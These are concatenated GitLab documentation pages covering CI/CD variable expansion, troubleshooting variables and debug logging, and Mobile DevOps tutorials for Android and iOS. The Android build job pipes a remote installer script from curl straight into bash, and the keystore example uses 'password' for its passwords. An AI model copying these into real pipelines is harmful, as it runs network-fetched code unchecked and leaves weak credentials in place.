For artifacts and cache uploads, the runner uses [mvdan.cc/sh/v3/expand](https://pkg.go.dev/mvdan.cc/sh/v3/expand) for variable expansion instead of Go's `os.Expand()` because `mvdan.cc/sh/v3/expand` supports [parameter expansion](https://www.gnu.org/software/bash/manual/html_node/Shell-Parameter-Expansion.html).

### Execution shell environment

This is an expansion phase that takes place during the `script` execution. Its behavior depends on the shell used (`bash`, `sh`, `cmd`, PowerShell). For example, if the job's `script` contains a line `echo $MY_VARIABLE-${MY_VARIABLE_2}`, it is properly handled by bash/sh (leaving empty strings or some values depending on whether the variables were defined or not), but it doesn't work with Windows `cmd` or PowerShell, because these shells use a different variable syntax.

Supported:

- The `script` may use all available variables that are default for the shell (for example, `$PATH` which should be present in all bash/sh shells) and all variables defined by GitLab CI/CD (project/group variables, `.gitlab-ci.yml` variables, `config.toml` variables, and variables from triggers and pipeline schedules).
- The `script` may also use all variables defined in the lines before. So, for example, if you define a variable `export MY_VARIABLE="test"`:
  - In `before_script`, it works in the subsequent lines of `before_script` and all lines of the related `script`.
  - In `script`, it works in the subsequent lines of `script`.
  - In `after_script`, it works in subsequent lines of `after_script`.

In the case of `after_script` scripts, they can:

- Only use variables defined before the script within the same `after_script` section.
- Not use variables defined in `before_script` and `script`.

These restrictions exist because `after_script` scripts are executed in a [separated shell context](../yaml/_index.md#after_script).

## Persisted variables

Some predefined variables are called persisted.
Persisted variables are:

- Supported for definitions where the [expansion place](#gitlab-ciyml-file) is:
  - Runner.
  - Script execution shell.
- Not supported:
  - For definitions where the [expansion place](#gitlab-ciyml-file) is GitLab.
  - In `rules` [variables expressions](../jobs/job_rules.md#cicd-variable-expressions).

[Pipeline trigger jobs](../yaml/_index.md#trigger) cannot use job-level persisted variables, but can use pipeline-level persisted variables.

Some of the persisted variables contain tokens and cannot be used by some definitions due to security reasons.

Pipeline-level persisted variables:

- `CI_PIPELINE_ID`
- `CI_PIPELINE_URL`

Job-level persisted variables:

- `CI_DEPLOY_PASSWORD`
- `CI_DEPLOY_USER`
- `CI_JOB_ID`
- `CI_JOB_STARTED_AT`
- `CI_JOB_TOKEN`
- `CI_JOB_URL`
- `CI_PIPELINE_CREATED_AT`
- `CI_REGISTRY_PASSWORD`
- `CI_REGISTRY_USER`
- `CI_REPOSITORY_URL`

## Variables with an environment scope

Variables defined with an environment scope are supported. Given that there is a variable `$STAGING_SECRET` defined in a scope of `review/staging/*`, the following job that uses dynamic environments is created, based on the matching variable expression:

```yaml
my-job:
  stage: staging
  environment:
    name: review/$CI_JOB_STAGE/deploy
  script:
    - 'deploy staging'
  rules:
    - if: $STAGING_SECRET == 'something'
```
---
stage: Verify
group: Pipeline Authoring
info: To determine the technical writer assigned to the Stage/Group associated with this page, see https://handbook.gitlab.com/handbook/product/ux/technical-writing/#assignments
title: Troubleshooting CI/CD variables
---
## List all variables

You can list all variables available to a script with the `export` command in Bash or `dir env:` in PowerShell. This exposes the values of **all** available variables, which can be a [security risk](_index.md#cicd-variable-security). [Masked variables](_index.md#mask-a-cicd-variable) display as `[MASKED]`.

For example, with Bash:

```yaml
job_name:
  script:
    - export
```

Example job log output (truncated):

```shell
export CI_JOB_ID="50"
export CI_COMMIT_SHA="1ecfd275763eff1d6b4844ea3168962458c9f27a"
export CI_COMMIT_SHORT_SHA="1ecfd275"
export CI_COMMIT_REF_NAME="main"
export CI_REPOSITORY_URL="https://gitlab-ci-token:[MASKED]@example.com/gitlab-org/gitlab.git"
export CI_COMMIT_TAG="1.0.0"
export CI_JOB_NAME="spec:other"
export CI_JOB_STAGE="test"
export CI_JOB_MANUAL="true"
export CI_JOB_TRIGGERED="true"
export CI_JOB_TOKEN="[MASKED]"
export CI_PIPELINE_ID="1000"
export CI_PIPELINE_IID="10"
export CI_PAGES_DOMAIN="gitlab.io"
export CI_PAGES_URL="https://gitlab-org.gitlab.io/gitlab"
export CI_PROJECT_ID="34"
export CI_PROJECT_DIR="/builds/gitlab-org/gitlab"
export CI_PROJECT_NAME="gitlab"
export CI_PROJECT_TITLE="GitLab"
...
```

## Enable debug logging

{{< alert type="warning" >}}

Debug logging can be a serious security risk. The output contains the content of all variables available to the job. The output is uploaded to the GitLab server and visible in job logs.

{{< /alert >}}

You can use debug logging to help troubleshoot problems with pipeline configuration or job scripts. Debug logging exposes job execution details that are usually hidden by the runner and makes job logs more verbose. It also exposes all variables and secrets available to the job.

Before you enable debug logging, make sure only team members can view job logs. You should also [delete job logs](../jobs/_index.md#view-jobs-in-a-pipeline) with debug output before you make logs public again.
To enable debug logging, set the `CI_DEBUG_TRACE` variable to `true`: ```yaml job_name: variables: CI_DEBUG_TRACE: "true" ``` Example output (truncated): ```plaintext ... export CI_SERVER_TLS_CA_FILE="/builds/gitlab-examples/ci-debug-trace.tmp/CI_SERVER_TLS_CA_FILE" if [[ -d "/builds/gitlab-examples/ci-debug-trace/.git" ]]; then echo $'\''\x1b[32;1mFetching changes...\x1b[0;m'\'' $'\''cd'\'' "/builds/gitlab-examples/ci-debug-trace" $'\''git'\'' "config" "fetch.recurseSubmodules" "false" $'\''rm'\'' "-f" ".git/index.lock" $'\''git'\'' "clean" "-ffdx" $'\''git'\'' "reset" "--hard" $'\''git'\'' "remote" "set-url" "origin" "https://gitlab-ci-token:xxxxxxxxxxxxxxxxxxxx@example.com/gitlab-examples/ci-debug-trace.git" $'\''git'\'' "fetch" "origin" "--prune" "+refs/heads/*:refs/remotes/origin/*" "+refs/tags/*:refs/tags/lds" ++ CI_BUILDS_DIR=/builds ++ export CI_PROJECT_DIR=/builds/gitlab-examples/ci-debug-trace ++ CI_PROJECT_DIR=/builds/gitlab-examples/ci-debug-trace ++ export CI_CONCURRENT_ID=87 ++ CI_CONCURRENT_ID=87 ++ export CI_CONCURRENT_PROJECT_ID=0 ++ CI_CONCURRENT_PROJECT_ID=0 ++ export CI_SERVER=yes ++ CI_SERVER=yes ++ mkdir -p /builds/gitlab-examples/ci-debug-trace.tmp ++ echo -n '-----BEGIN CERTIFICATE----- -----END CERTIFICATE-----' ++ export CI_SERVER_TLS_CA_FILE=/builds/gitlab-examples/ci-debug-trace.tmp/CI_SERVER_TLS_CA_FILE ++ CI_SERVER_TLS_CA_FILE=/builds/gitlab-examples/ci-debug-trace.tmp/CI_SERVER_TLS_CA_FILE ++ export CI_PIPELINE_ID=52666 ++ CI_PIPELINE_ID=52666 ++ export CI_PIPELINE_URL=https://gitlab.com/gitlab-examples/ci-debug-trace/pipelines/52666 ++ CI_PIPELINE_URL=https://gitlab.com/gitlab-examples/ci-debug-trace/pipelines/52666 ++ export CI_JOB_ID=7046507 ++ CI_JOB_ID=7046507 ++ export CI_JOB_URL=https://gitlab.com/gitlab-examples/ci-debug-trace/-/jobs/379424655 ++ CI_JOB_URL=https://gitlab.com/gitlab-examples/ci-debug-trace/-/jobs/379424655 ++ export CI_JOB_TOKEN=[MASKED] ++ CI_JOB_TOKEN=[MASKED] ++ export CI_REGISTRY_USER=gitlab-ci-token ++ 
CI_REGISTRY_USER=gitlab-ci-token ++ export CI_REGISTRY_PASSWORD=[MASKED] ++ CI_REGISTRY_PASSWORD=[MASKED] ++ export CI_REPOSITORY_URL=https://gitlab-ci-token:[MASKED]@gitlab.com/gitlab-examples/ci-debug-trace.git ++ CI_REPOSITORY_URL=https://gitlab-ci-token:[MASKED]@gitlab.com/gitlab-examples/ci-debug-trace.git ++ export CI_JOB_NAME=debug_trace ++ CI_JOB_NAME=debug_trace ++ export CI_JOB_STAGE=test ++ CI_JOB_STAGE=test ++ export CI_NODE_TOTAL=1 ++ CI_NODE_TOTAL=1 ++ export CI=true ++ CI=true ++ export GITLAB_CI=true ++ GITLAB_CI=true ++ export CI_SERVER_URL=https://gitlab.com:3000 ++ CI_SERVER_URL=https://gitlab.com:3000 ++ export CI_SERVER_HOST=gitlab.com ++ CI_SERVER_HOST=gitlab.com ++ export CI_SERVER_PORT=3000 ++ CI_SERVER_PORT=3000 ++ export CI_SERVER_SHELL_SSH_HOST=gitlab.com ++ CI_SERVER_SHELL_SSH_HOST=gitlab.com ++ export CI_SERVER_SHELL_SSH_PORT=22 ++ CI_SERVER_SHELL_SSH_PORT=22 ++ export CI_SERVER_PROTOCOL=https ++ CI_SERVER_PROTOCOL=https ++ export CI_SERVER_NAME=GitLab ++ CI_SERVER_NAME=GitLab ++ export 
GITLAB_FEATURES=audit_events,burndown_charts,code_owners,contribution_analytics,description_diffs,elastic_search,group_bulk_edit,group_burndown_charts,group_webhooks,issuable_default_templates,issue_weights,jenkins_integration,ldap_group_sync,member_lock,merge_request_approvers,multiple_issue_assignees,multiple_ldap_servers,multiple_merge_request_assignees,protected_refs_for_users,push_rules,related_issues,repository_mirrors,repository_size_limit,scoped_issue_board,usage_quotas,wip_limits,admin_audit_log,auditor_user,batch_comments,blocking_merge_requests,board_assignee_lists,board_milestone_lists,ci_cd_projects,cluster_deployments,code_analytics,code_owner_approval_required,commit_committer_check,cross_project_pipelines,custom_file_templates,custom_file_templates_for_namespace,custom_project_templates,custom_prometheus_metrics,cycle_analytics_for_groups,db_load_balancing,default_project_deletion_protection,dependency_proxy,deploy_board,design_management,email_additional_text,extended_audit_events,external_authorization_service_api_management,feature_flags,file_locks,geo,github_integration,group_allowed_email_domains,group_project_templates,group_saml,issues_analytics,jira_dev_panel_integration,ldap_group_sync_filter,merge_pipelines,merge_request_performance_metrics,merge_trains,metrics_reports,multiple_approval_rules,multiple_group_issue_boards,object_storage,operations_dashboard,packages,productivity_analytics,project_aliases,protected_environments,reject_unsigned_commits,required_ci_templates,scoped_labels,service_desk,smartcard_auth,group_timelogs,type_of_work_analytics,unprotection_restrictions,ci_project_subscriptions,container_scanning,dast,dependency_scanning,epics,group_ip_restriction,incident_management,insights,license_management,personal_access_token_expiration_policy,pod_logs,prometheus_alerts,report_approver_rules,sast,security_dashboard,tracing,web_ide_terminal ++ 
GITLAB_FEATURES=audit_events,burndown_charts,code_owners,contribution_analytics,description_diffs,elastic_search,group_bulk_edit,group_burndown_charts,group_webhooks,issuable_default_templates,issue_weights,jenkins_integration,ldap_group_sync,member_lock,merge_request_approvers,multiple_issue_assignees,multiple_ldap_servers,multiple_merge_request_assignees,protected_refs_for_users,push_rules,related_issues,repository_mirrors,repository_size_limit,scoped_issue_board,usage_quotas,wip_limits,admin_audit_log,auditor_user,batch_comments,blocking_merge_requests,board_assignee_lists,board_milestone_lists,ci_cd_projects,cluster_deployments,code_analytics,code_owner_approval_required,commit_committer_check,cross_project_pipelines,custom_file_templates,custom_file_templates_for_namespace,custom_project_templates,custom_prometheus_metrics,cycle_analytics_for_groups,db_load_balancing,default_project_deletion_protection,dependency_proxy,deploy_board,design_management,email_additional_text,extended_audit_events,external_authorization_service_api_management,feature_flags,file_locks,geo,github_integration,group_allowed_email_domains,group_project_templates,group_saml,issues_analytics,jira_dev_panel_integration,ldap_group_sync_filter,merge_pipelines,merge_request_performance_metrics,merge_trains,metrics_reports,multiple_approval_rules,multiple_group_issue_boards,object_storage,operations_dashboard,packages,productivity_analytics,project_aliases,protected_environments,reject_unsigned_commits,required_ci_templates,scoped_labels,service_desk,smartcard_auth,group_timelogs,type_of_work_analytics,unprotection_restrictions,ci_project_subscriptions,cluster_health,container_scanning,dast,dependency_scanning,epics,group_ip_restriction,incident_management,insights,license_management,personal_access_token_expiration_policy,pod_logs,prometheus_alerts,report_approver_rules,sast,security_dashboard,tracing,web_ide_terminal ++ export CI_PROJECT_ID=17893 ++ CI_PROJECT_ID=17893 ++ export 
CI_PROJECT_NAME=ci-debug-trace ++ CI_PROJECT_NAME=ci-debug-trace ... ``` ### Access to debug logging Access to debug logging is restricted to [users with at least the Developer role](../../user/permissions.md#cicd). Users with a lower role cannot see the logs when debug logging is enabled with a variable in: - The [`.gitlab-ci.yml` file](_index.md#define-a-cicd-variable-in-the-gitlab-ciyml-file). - The CI/CD variables set in the GitLab UI. {{< alert type="warning" >}} If you add `CI_DEBUG_TRACE` as a local variable to runners, debug logs generate and are visible to all users with access to job logs. The permission levels are not checked by the runner, so you should only use the variable in GitLab itself. {{< /alert >}} ## `argument list too long` error This issue occurs when the combined length of all CI/CD variables defined for a job exceeds the limit imposed by the shell where the job executes. This includes the names and values of pre-defined and user defined variables. This limit is typically referred to as `ARG_MAX`, and is shell and operating system dependent. This issue also occurs when the content of a single [File-type](_index.md#use-file-type-cicd-variables) variable exceeds `ARG_MAX`. For more information, see [issue 392406](https://gitlab.com/gitlab-org/gitlab/-/issues/392406#note_1414219596). As a workaround you can either: - Use [File-type](_index.md#use-file-type-cicd-variables) CI/CD variables for large environment variables where possible. - If a single large variable is larger than `ARG_MAX`, try using [Secure Files](../secure_files/_index.md), or bring the file to the job through some other mechanism. 
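The first workaround can be sketched as follows. Assuming `LARGE_PAYLOAD` is defined in the project
settings as a File-type variable (the name is illustrative), the job's environment contains only a
short temporary file path, not the full content, so the content no longer counts toward `ARG_MAX`:

```yaml
process-payload:
  script:
    # $LARGE_PAYLOAD expands to a file path such as
    # /builds/<project>.tmp/LARGE_PAYLOAD, not the raw content.
    - cat "$LARGE_PAYLOAD"
```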
## `Insufficient permissions to set pipeline variables` error for a downstream pipeline

When triggering a downstream pipeline, you might get this error unexpectedly:

```plaintext
Failed - (downstream pipeline can not be created, Insufficient permissions to set pipeline variables)
```

This error occurs when a downstream project has
[restricted pipeline variables](_index.md#restrict-pipeline-variables) and the trigger job either:

- Has variables defined. For example:

  ```yaml
  trigger-job:
    variables:
      VAR_FOR_DOWNSTREAM: "test"
    trigger: my-group/my-project
  ```

- Receives variables from [default variables](../yaml/_index.md#default-variables) defined in a
  top-level `variables` section. For example:

  ```yaml
  variables:
    DEFAULT_VAR: "test"

  trigger-job:
    trigger: my-group/my-project
  ```

Variables passed to a downstream pipeline in a trigger job are
[pipeline variables](_index.md#use-pipeline-variables), so the workaround is to either:

- Remove the `variables` defined in the trigger job to avoid passing variables.
- [Prevent default variables from being passed to the downstream pipeline](../pipelines/downstream_pipelines.md#prevent-default-variables-from-being-passed).

## Default variable doesn't expand in job variable of the same name

You cannot use a default variable's value in a job variable of the same name.

A default variable is only made available to a job when the job does not have a variable defined
with the same name. If the job has a variable with the same name, the job's variable takes
precedence and the default variable is not available in the job.

For example, these two samples are equivalent:

- In this sample, `$MY_VAR` has no value because it's not defined anywhere:

  ```yaml
  Job-with-variable:
    variables:
      MY_VAR: $MY_VAR
    script: echo "Value is '$MY_VAR'"
  ```

- In this sample, `$MY_VAR` has no value because the default variable with the same name is not
  available in the job:

  ```yaml
  variables:
    MY_VAR: "Default value"

  Job-with-same-name-variable:
    variables:
      MY_VAR: $MY_VAR
    script: echo "Value is '$MY_VAR'"
  ```

In both cases, the `echo` command outputs `Value is '$MY_VAR'`.

In general, you should use the default variable directly in a job rather than reassigning its value
to a new variable. If you must reassign the value, use variables with different names instead.
For example:

```yaml
variables:
  MY_VAR1: "Default value1"
  MY_VAR2: "Default value2"

overwrite-same-name:
  variables:
    MY_VAR2_FROM_DEFAULTS: $MY_VAR2
  script: echo "Values are '$MY_VAR1' and '$MY_VAR2_FROM_DEFAULTS'"
```
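The name-precedence outcome of the final example can be simulated in a plain shell. This is a local
sketch, not a CI job (the runner's variable expansion is more involved), but because
`MY_VAR2_FROM_DEFAULTS` uses a different name than `MY_VAR2`, the default value remains visible at
assignment time:

```shell
# Simulate the top-level defaults and the job-level reassignment.
MY_VAR1="Default value1"
MY_VAR2="Default value2"
# Different name, so $MY_VAR2 still holds its default value here.
MY_VAR2_FROM_DEFAULTS="$MY_VAR2"
result="Values are '$MY_VAR1' and '$MY_VAR2_FROM_DEFAULTS'"
echo "$result"
# → Values are 'Default value1' and 'Default value2'
```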
---
stage: Verify
group: Pipeline Authoring
info: To determine the technical writer assigned to the Stage/Group associated with this page, see https://handbook.gitlab.com/handbook/product/ux/technical-writing/#assignments
title: Troubleshooting CI/CD variables
breadcrumbs:
- doc
- ci
- variables
---
https://docs.gitlab.com/ci/mobile_devops_tutorial_android
https://gitlab.com/gitlab-org/gitlab/-/tree/master/doc/ci/mobile_devops_tutorial_android.md
2025-08-13
doc/ci/mobile_devops
[ "doc", "ci", "mobile_devops" ]
mobile_devops_tutorial_android.md
Verify
Mobile DevOps
To determine the technical writer assigned to the Stage/Group associated with this page, see https://handbook.gitlab.com/handbook/product/ux/technical-writing/#assignments
Tutorial: Build Android apps with GitLab Mobile DevOps
null
In this tutorial, you'll create a pipeline by using GitLab CI/CD that builds your Android mobile
app, signs it with your credentials, and distributes it to app stores.

To set up mobile DevOps:

1. [Set up your build environment](#set-up-your-build-environment)
1. [Configure code signing with fastlane and Gradle](#configure-code-signing-with-fastlane-and-gradle)
1. [Set up Android apps distribution with Google Play integration and fastlane](#set-up-android-apps-distribution-with-google-play-integration-and-fastlane)

## Before you begin

Before you start this tutorial, make sure you have:

- A GitLab account with access to CI/CD pipelines
- Your mobile app code in a GitLab repository
- A Google Play developer account
- [`fastlane`](https://fastlane.tools) installed locally

## Set up your build environment

Use [GitLab-hosted runners](../runners/_index.md), or set up
[self-managed runners](https://docs.gitlab.com/runner/#use-self-managed-runners) for complete
control over the build environment. Android builds use Docker images, offering multiple Android
API versions.

1. Create a `.gitlab-ci.yml` file in your repository root.
1. Add a Docker image from [Fabernovel](https://hub.docker.com/r/fabernovel/android/tags):

   ```yaml
   test:
     image: fabernovel/android:api-33-v1.7.0
     stage: test
     script:
       - fastlane test
   ```

## Configure code signing with fastlane and Gradle

To set up code signing for Android:

1. Create a keystore:
   1. Run the following command to generate a keystore file:

      ```shell
      keytool -genkey -v -keystore release-keystore.jks -storepass password -alias release -keypass password \
        -keyalg RSA -keysize 2048 -validity 10000
      ```

   1. Put the keystore configuration in the `release-keystore.properties` file:

      ```plaintext
      storeFile=.secure_files/release-keystore.jks
      keyAlias=release
      keyPassword=password
      storePassword=password
      ```

   1. Upload both files as [Secure Files](../secure_files/_index.md) in your project settings.
   1. Add both files to your `.gitignore` file so they aren't committed to version control.
1. Configure Gradle to use the newly created keystore. In the app's `build.gradle` file:
   1. Immediately after the plugins section, add:

      ```gradle
      def keystoreProperties = new Properties()
      def keystorePropertiesFile = rootProject.file('.secure_files/release-keystore.properties')
      if (keystorePropertiesFile.exists()) {
        keystoreProperties.load(new FileInputStream(keystorePropertiesFile))
      }
      ```

   1. Anywhere in the `android` block, add:

      ```gradle
      signingConfigs {
        release {
          keyAlias keystoreProperties['keyAlias']
          keyPassword keystoreProperties['keyPassword']
          storeFile keystoreProperties['storeFile'] ? file(keystoreProperties['storeFile']) : null
          storePassword keystoreProperties['storePassword']
        }
      }
      ```

   1. Add the `signingConfig` to the release build type:

      ```gradle
      signingConfig signingConfigs.release
      ```

The following are sample `fastlane/Fastfile` and `.gitlab-ci.yml` files with this configuration:

- `fastlane/Fastfile`:

  ```ruby
  default_platform(:android)

  platform :android do
    desc "Create and sign a new build"
    lane :build do
      gradle(tasks: ["clean", "assembleRelease", "bundleRelease"])
    end
  end
  ```

- `.gitlab-ci.yml`:

  ```yaml
  build:
    image: fabernovel/android:api-33-v1.7.0
    stage: build
    script:
      - apt update -y && apt install -y curl
      - curl --silent "https://gitlab.com/gitlab-org/incubation-engineering/mobile-devops/download-secure-files/-/raw/main/installer" | bash
      - fastlane build
  ```

## Set up Android apps distribution with Google Play integration and fastlane

Signed builds can be uploaded to the Google Play Store by using the Mobile DevOps Distribution
integrations.

1. [Create a Google service account](https://docs.fastlane.tools/actions/supply/#setup) in Google
   Cloud Platform and grant that account access to the project in Google Play.
1. Enable the Google Play integration:
   1. On the left sidebar, select **Search or go to** and find your project.
   1. Select **Settings > Integrations**.
   1. Select **Google Play**.
   1. Under **Enable integration**, select the **Active** checkbox.
   1. In **Package name**, enter the package name of the app. For example, `com.gitlab.app_name`.
   1. In **Service account key (.JSON)**, drag or upload your key file.
   1. Select **Save changes**.
1. Add the release step to your pipeline.

   The following is a sample `fastlane/Fastfile`:

   ```ruby
   default_platform(:android)

   platform :android do
     desc "Submit a new Beta build to the Google Play store"
     lane :beta do
       upload_to_play_store(
         track: 'internal',
         aab: 'app/build/outputs/bundle/release/app-release.aab',
         release_status: 'draft'
       )
     end
   end
   ```

   The following is a sample `.gitlab-ci.yml`:

   ```yaml
   beta:
     image: fabernovel/android:api-33-v1.7.0
     stage: beta
     script:
       - fastlane beta
   ```

<i class="fa fa-youtube-play youtube" aria-hidden="true"></i>
For an overview, see [Google Play integration demo](https://youtu.be/Fxaj3hna4uk).

Congratulations! Your app is now set up for automated building, signing, and distribution.
Try creating a merge request to trigger your first pipeline.

## Related topics

See the Mobile DevOps [Android Demo](https://gitlab.com/gitlab-org/incubation-engineering/mobile-devops/demo-projects/android_demo)
project for a complete build, sign, and release pipeline example for Android.

For additional reference materials, see the [DevOps section](https://about.gitlab.com/blog/categories/devops/)
of the GitLab blog.
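One detail the code-signing section above leaves implicit is the content of the `.gitignore`
entries. Assuming the filenames used in the keystore commands (this fragment is a supplement, not
part of the official tutorial), they would be:

```plaintext
# Keep signing material out of version control; CI jobs receive
# these as Secure Files instead.
release-keystore.jks
release-keystore.properties
```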
--- stage: Verify group: Mobile DevOps info: To determine the technical writer assigned to the Stage/Group associated with this page, see https://handbook.gitlab.com/handbook/product/ux/technical-writing/#assignments title: 'Tutorial: Build Android apps with GitLab Mobile DevOps' breadcrumbs: - doc - ci - mobile_devops --- In this tutorial, you'll create a pipeline by using GitLab CI/CD that builds your Android mobile app, signs it with your credentials, and distributes it to app stores. To set up mobile DevOps: 1. [Set up your build environment](#set-up-your-build-environment) 1. [Configure code signing with fastlane and Gradle](#configure-code-signing-with-fastlane-and-gradle) 1. [Set up Android apps distribution with Google Play integration and fastlane](#set-up-android-apps-distribution-with-google-play-integration-and-fastlane) ## Before you begin Before you start this tutorial, make sure you have: - A GitLab account with access to CI/CD pipelines - Your mobile app code in a GitLab repository - A Google Play developer account - [`fastlane`](https://fastlane.tools) installed locally ## Set up your build environment Use [GitLab-hosted runners](../runners/_index.md), or set up [self-managed runners](https://docs.gitlab.com/runner/#use-self-managed-runners) for complete control over the build environment. Android builds use Docker images, offering multiple Android API versions. 1. Create a `.gitlab-ci.yml` file in your repository root. 1. Add a Docker image from [Fabernovel](https://hub.docker.com/r/fabernovel/android/tags): ```yaml test: image: fabernovel/android:api-33-v1.7.0 stage: test script: - fastlane test ``` ## Configure code signing with fastlane and Gradle To set up code signing for Android: 1. Create a keystore: 1. Run the following command to generate a keystore file: ```shell keytool -genkey -v -keystore release-keystore.jks -storepass password -alias release -keypass password \ -keyalg RSA -keysize 2048 -validity 10000 ``` 1. 
Put the keystore configuration in the `release-keystore.properties` file: ```plaintext storeFile=.secure_files/release-keystore.jks keyAlias=release keyPassword=password storePassword=password ``` 1. Upload both files as [Secure Files](../secure_files/_index.md) in your project settings. 1. Add both files to your `.gitignore` file so they aren't committed to version control. 1. Configure Gradle to use the newly created keystore. In the app's `build.gradle` file: 1. Immediately after the plugins section, add: ```gradle def keystoreProperties = new Properties() def keystorePropertiesFile = rootProject.file('.secure_files/release-keystore.properties') if (keystorePropertiesFile.exists()) { keystoreProperties.load(new FileInputStream(keystorePropertiesFile)) } ``` 1. Anywhere in the `android` block, add: ```gradle signingConfigs { release { keyAlias keystoreProperties['keyAlias'] keyPassword keystoreProperties['keyPassword'] storeFile keystoreProperties['storeFile'] ? file(keystoreProperties['storeFile']) : null storePassword keystoreProperties['storePassword'] } } ``` 1. Add the `signingConfig` to the release build type: ```gradle signingConfig signingConfigs.release ``` The following are sample `fastlane/Fastfile` and `.gitlab-ci.yml` files with this configuration: - `fastlane/Fastfile`: ```ruby default_platform(:android) platform :android do desc "Create and sign a new build" lane :build do gradle(tasks: ["clean", "assembleRelease", "bundleRelease"]) end end ``` - `.gitlab-ci.yml`: ```yaml build: image: fabernovel/android:api-33-v1.7.0 stage: build script: - apt update -y && apt install -y curl - curl --silent "https://gitlab.com/gitlab-org/incubation-engineering/mobile-devops/download-secure-files/-/raw/main/installer" | bash - fastlane build ``` ## Set up Android apps distribution with Google Play integration and fastlane Signed builds can be uploaded to the Google Play Store by using the Mobile DevOps Distribution integrations. 1. 
[Create a Google service account](https://docs.fastlane.tools/actions/supply/#setup) in Google Cloud Platform and grant that account access to the project in Google Play. 1. Enable the Google Play integration: 1. On the left sidebar, select **Search or go to** and find your project. 1. Select **Settings > Integrations**. 1. Select **Google Play**. 1. Under **Enable integration**, select the **Active** checkbox. 1. In **Package name**, enter the package name of the app. For example, `com.gitlab.app_name`. 1. In **Service account key (.JSON)**, drag or upload your key file. 1. Select **Save changes**. 1. Add the release step to your pipeline. The following is a sample `fastlane/Fastfile`: ```ruby default_platform(:android) platform :android do desc "Submit a new Beta build to the Google Play store" lane :beta do upload_to_play_store( track: 'internal', aab: 'app/build/outputs/bundle/release/app-release.aab', release_status: 'draft' ) end end ``` The following is a sample `.gitlab-ci.yml`: ```yaml beta: image: fabernovel/android:api-33-v1.7.0 stage: beta script: - fastlane beta ``` <i class="fa fa-youtube-play youtube" aria-hidden="true"></i> For an overview, see [Google Play integration demo](https://youtu.be/Fxaj3hna4uk). Congratulations! Your app is now set up for automated building, signing, and distribution. Try creating a merge request to trigger your first pipeline. ## Related topics See the Mobile DevOps [Android Demo](https://gitlab.com/gitlab-org/incubation-engineering/mobile-devops/demo-projects/android_demo) project for a complete build, sign, and release pipeline example for Android. For additional reference materials, see the [DevOps section](https://about.gitlab.com/blog/categories/devops/) of the GitLab blog.
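Taken together, the tutorial's test, build, and beta jobs form one pipeline. The following `.gitlab-ci.yml` is a sketch only: it assumes the `fabernovel/android:api-33-v1.7.0` image and the fastlane `test`, `build`, and `beta` lanes shown in the samples above, and the `artifacts` and `rules` entries are illustrative additions, not part of the tutorial:

```yaml
# Sketch: combined pipeline assembled from the tutorial's sample jobs.
stages:
  - test
  - build
  - beta

default:
  image: fabernovel/android:api-33-v1.7.0

test:
  stage: test
  script:
    - fastlane test

build:
  stage: build
  script:
    - apt update -y && apt install -y curl
    # Download project-level secure files (keystore and properties) before signing.
    - curl --silent "https://gitlab.com/gitlab-org/incubation-engineering/mobile-devops/download-secure-files/-/raw/main/installer" | bash
    - fastlane build
  artifacts:
    paths:
      - app/build/outputs/

beta:
  stage: beta
  script:
    - fastlane beta
  rules:
    # Assumption: only publish beta builds from the default branch.
    - if: $CI_COMMIT_BRANCH == $CI_DEFAULT_BRANCH
```

Restricting `beta` to the default branch keeps merge request pipelines from uploading drafts to Google Play; adjust or drop the rule to match your branching model.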
https://docs.gitlab.com/ci/mobile_devops_tutorial_ios
https://gitlab.com/gitlab-org/gitlab/-/tree/master/doc/ci/mobile_devops_tutorial_ios.md
2025-08-13
doc/ci/mobile_devops
[ "doc", "ci", "mobile_devops" ]
mobile_devops_tutorial_ios.md
Verify
Mobile DevOps
To determine the technical writer assigned to the Stage/Group associated with this page, see https://handbook.gitlab.com/handbook/product/ux/technical-writing/#assignments
Tutorial: Build iOS apps with GitLab Mobile DevOps
null
In this tutorial, you'll create a pipeline by using GitLab CI/CD that builds your iOS mobile app, signs it with your credentials, and distributes it to app stores. To set up mobile DevOps: 1. [Set up your build environment](#set-up-your-build-environment) 1. [Configure code signing with fastlane](#configure-code-signing-with-fastlane) 1. [Set up app distribution with Apple Store integration and fastlane](#set-up-app-distribution-with-apple-store-integration-and-fastlane) ## Before you begin Before you start this tutorial, make sure you have: - A GitLab account with access to CI/CD pipelines - Your mobile app code in a GitLab repository - An Apple Developer account - [`fastlane`](https://fastlane.tools) installed locally ## Set up your build environment Use [GitLab-hosted runners](../runners/_index.md), or set up [self-managed runners](https://docs.gitlab.com/runner/#use-self-managed-runners) for complete control over the build environment. 1. Create a `.gitlab-ci.yml` file in your repository root. 1. Add a [supported macOS image](../runners/hosted_runners/macos.md#supported-macos-images) to run a job on a [macOS GitLab-hosted runner](../runners/hosted_runners/macos.md) (beta): ```yaml test: image: macos-14-xcode-15 stage: test script: - fastlane test tags: - saas-macos-medium-m1 ``` ## Configure code signing with fastlane To set up code signing for iOS, upload signed certificates to GitLab by using fastlane: 1. Initialize fastlane: ```shell fastlane init ``` 1. Generate a `Matchfile` with the configuration: ```shell fastlane match init ``` 1. Generate certificates and profiles in the Apple Developer portal and upload those files to GitLab: ```shell PRIVATE_TOKEN=YOUR-TOKEN bundle exec fastlane match development ``` 1. Optional. 
If you have already created signing certificates and provisioning profiles for your project, use `fastlane match import` to load your existing files into GitLab: ```shell PRIVATE_TOKEN=YOUR-TOKEN bundle exec fastlane match import ``` You are prompted to input the path to your files. After you provide those details, your files are uploaded and visible in your project's CI/CD settings. If prompted for the `git_url` during the import, it is safe to leave it blank and press <kbd>enter</kbd>. The following are sample `fastlane/Fastfile` and `.gitlab-ci.yml` files with this configuration: - `fastlane/Fastfile`: ```ruby default_platform(:ios) platform :ios do desc "Build and sign the application for development" lane :build do setup_ci match(type: 'development', readonly: is_ci) build_app( project: "ios demo.xcodeproj", scheme: "ios demo", configuration: "Debug", export_method: "development" ) end end ``` - `.gitlab-ci.yml`: ```yaml build_ios: image: macos-12-xcode-14 stage: build script: - fastlane build tags: - saas-macos-medium-m1 ``` ## Set up app distribution with Apple Store integration and fastlane Signed builds can be uploaded to the Apple App Store by using the Mobile DevOps Distribution integrations. Prerequisites: - You must have an Apple ID enrolled in the Apple Developer Program. - You must generate a new private key for your project in the Apple App Store Connect portal. To create an iOS distribution with the Apple Store integration and fastlane: 1. Generate an API Key for App Store Connect API. In the Apple App Store Connect portal, [generate a new private key for your project](https://developer.apple.com/documentation/appstoreconnectapi/creating_api_keys_for_app_store_connect_api). 1. Enable the Apple App Store Connect integration: 1. On the left sidebar, select **Search or go to** and find your project. 1. Select **Settings > Integrations**. 1. Select **Apple App Store Connect**. 1. Under **Enable integration**, select the **Active** checkbox. 